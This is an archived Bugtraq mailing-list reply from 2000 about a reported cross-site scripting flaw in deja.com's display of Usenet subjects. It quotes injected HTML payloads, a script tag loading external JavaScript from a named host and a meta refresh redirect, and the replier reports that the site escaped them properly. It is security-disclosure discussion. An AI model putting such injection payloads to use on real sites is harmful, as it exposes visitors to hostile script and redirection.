Home page logo

bugtraq logo Bugtraq mailing list archives

Re: Malicious-HTML vulnerabilities at deja.com
From: geert () UTTNARAG TN UTWENTE NL (Geert Altena)
Date: Fri, 17 Mar 2000 12:31:46 +0100

You, Niall Smart, <niall () POBOX COM>, wrote:

deja.com does not always escape meta-characters when displaying
Usenet articles.  Specifically, the article view page
(http://www.deja.com/getdoc.xp) and the thread view page
(http://www.deja.com/viewthread.xp) display the subject of the
article "as is" between title tags.


JavaScript popup:


Comes out as (copy/paste from netscape):
Forum: alt.test
Thread: </title><script
onLoad="return bar()">
Message 1 of 1

Subject: </title><script src="http://www.in-design.com/~nsmart/foo.js";>
         </script><body onLoad="return bar()">
Date: 03/01/2000
Author: regkey <regkey () yahoo com>

I have javascript enabled, no popup.

Redirection using meta tag:


Comes out as:
Forum: alt.test
Thread: </title><meta http-equiv="refresh"
Message 1 of 1

Subject: </title><meta http-equiv="refresh"
Date: 03/01/2000
Author: regkey <regkey () yahoo com>

No redirection here to www.in-design.com.

Looking at the source, in both cases (javascript and meta rerefresh) the
"<" and ">" are properly replaced by "&lt;" and "&gt;" eliminating the
vulnerabilities you mentioned. Same thing applies then I get the article
via powersearch.

So either someone at Deja reads Bugtraq and did a fix before this reply or
this is a case where things _are_ properly escaped.


Geert Altena | Geert () uttnarag tn utwente nl | Coffee, black, no sugar
         Finger for PGPkey : Diffie-Hellman 2048/0xC540C550
  Prediction is difficult, especially of the future. - (Niels Bohr)

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]